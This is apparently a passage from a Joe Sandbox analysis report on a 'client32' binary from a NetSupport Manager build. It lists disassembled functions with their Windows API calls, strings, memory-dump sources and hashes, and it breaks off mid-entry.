                                                                              • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                              • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                              Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                              • m_hWnd, xrefs: 11001066
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 819365019-2830328467
                                                                              • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                              • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                              • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                              • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                              Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                              • m_hWnd, xrefs: 110010F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 906220102-2830328467
                                                                              • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                              • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                              • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                              • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                              Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hWnd, xrefs: 110151B6
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                              • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                              • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                              • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                              Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hWnd, xrefs: 11017206
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                              • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                              • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                              • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                              Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                              • m_hWnd, xrefs: 11001136
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1604732272-2830328467
                                                                              • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                              • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                              • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                              • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                              Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • KillTimer.USER32(?,?), ref: 1100102B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                              • m_hWnd, xrefs: 11001016
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2229609774-2830328467
                                                                              • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                              • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                              • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                              • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                              Function 1100D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                              • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoadVersion
                                                                              • String ID: AudioCapture.dll
                                                                              • API String ID: 3209957514-2642820777
                                                                              • Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                              • Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
                                                                              • Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                              • Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
                                                                              Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                              • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FindMessageSendWindow
                                                                              • String ID: MSOfficeWClass
                                                                              • API String ID: 1741975844-970895155
                                                                              • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                              • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                              • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                              • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                              Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                              • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                              • API String ID: 1417657345-2201682149
                                                                              • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                              • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                              • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                              • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                              Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                              • m_hWnd, xrefs: 1101D3A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1590435379-2830328467
                                                                              • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
